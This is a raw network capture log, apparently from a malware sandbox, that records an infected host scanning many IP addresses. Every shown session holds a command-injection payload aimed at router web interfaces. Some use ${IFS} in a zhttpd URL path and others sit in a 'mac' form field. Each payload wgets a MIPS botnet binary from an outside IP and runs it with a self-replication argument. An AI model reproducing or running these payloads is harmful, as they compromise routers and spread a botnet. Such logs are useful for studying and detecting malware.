                                              Jan 29, 2024 07:03:45.934573889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3518192.168.2.143918681.37.112.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934637070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3519192.168.2.1444000193.116.16.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934664965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3520192.168.2.1443080150.53.38.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934689999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3521192.168.2.144939682.127.150.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934729099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3522192.168.2.1451914181.201.47.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934760094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3523192.168.2.1456480109.2.166.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934817076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3524192.168.2.143560676.29.214.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934851885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3525192.168.2.1447540117.179.238.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934875011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3526192.168.2.144850438.33.115.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934931993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3527192.168.2.1443944182.198.168.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.934971094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3528192.168.2.144679064.47.195.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935004950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3529192.168.2.144311251.80.218.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935053110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3530192.168.2.1458818223.71.179.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935110092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3531192.168.2.1456150104.215.57.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935156107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3532192.168.2.1453174181.73.42.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935208082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3533192.168.2.143332824.67.168.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935250044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3534192.168.2.1448702222.246.177.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935311079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3535192.168.2.1444824137.189.252.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935350895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3536192.168.2.146049223.100.76.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935390949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3537192.168.2.143868074.235.192.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935425997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3538192.168.2.1436540161.41.85.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935453892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3539192.168.2.1441472150.151.221.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935503006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3540192.168.2.143385877.162.40.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935539007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3541192.168.2.1436090108.134.236.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935578108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3542192.168.2.1443722182.54.17.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935605049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3543192.168.2.1440252156.226.89.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935658932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3544192.168.2.146070498.215.118.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935699940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3545192.168.2.1437110220.195.150.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935748100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3546192.168.2.1447232190.68.18.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935766935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3547192.168.2.144023283.187.85.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935816050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3548192.168.2.143453283.109.255.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.935854912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3549192.168.2.1433802112.15.3.668080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.327958107 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:46.711478949 CET1286INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 29 Jan 2024 06:03:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 2448
                                              Connection: close
                                              x-ws-request-id: 65b73fc2_PS-000-01vAs132_6047-9752
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 4d 6f 6e 2c 20 32 39 20 4a 61 6e 20 32 30 32 34 20 30 36 3a 30 33 3a 34 36 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 76 41 73 31 33 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 3a 38 30 38 30 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 62 37 33 66 63 32 5f 50 53 2d 30 30 30 2d 30 31 76 41 73 31 33 32 5f 36 30 34 37 2d 39 37 35 32 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 62 72 3e 43 68 65 63 6b 3a 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 43 20 47 22 20 6f 6e 63 6c 69 63 6b 3d 22 73 28
                                              Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Mon, 29 Jan 2024 06:03:46 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: PS-000-01vAs132<br>URL: http://:8080/goform/set_LimitClient_cfg<br>Request-Id: 65b73fc2_PS-000-01vAs132_6047-9752<br><br>Check:<span class="C G" onclick="s(


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3550192.168.2.1433800112.15.3.668080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.336527109 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:46.735850096 CET1286INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 29 Jan 2024 06:03:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 2449
                                              Connection: close
                                              x-ws-request-id: 65b73fc2_PS-000-01vAs132_6450-44256
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 4d 6f 6e 2c 20 32 39 20 4a 61 6e 20 32 30 32 34 20 30 36 3a 30 33 3a 34 36 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 76 41 73 31 33 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 3a 38 30 38 30 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 62 37 33 66 63 32 5f 50 53 2d 30 30 30 2d 30 31 76 41 73 31 33 32 5f 36 34 35 30 2d 34 34 32 35 36 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 62 72 3e 43 68 65 63 6b 3a 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 43 20 47 22 20 6f 6e 63 6c 69 63 6b 3d 22
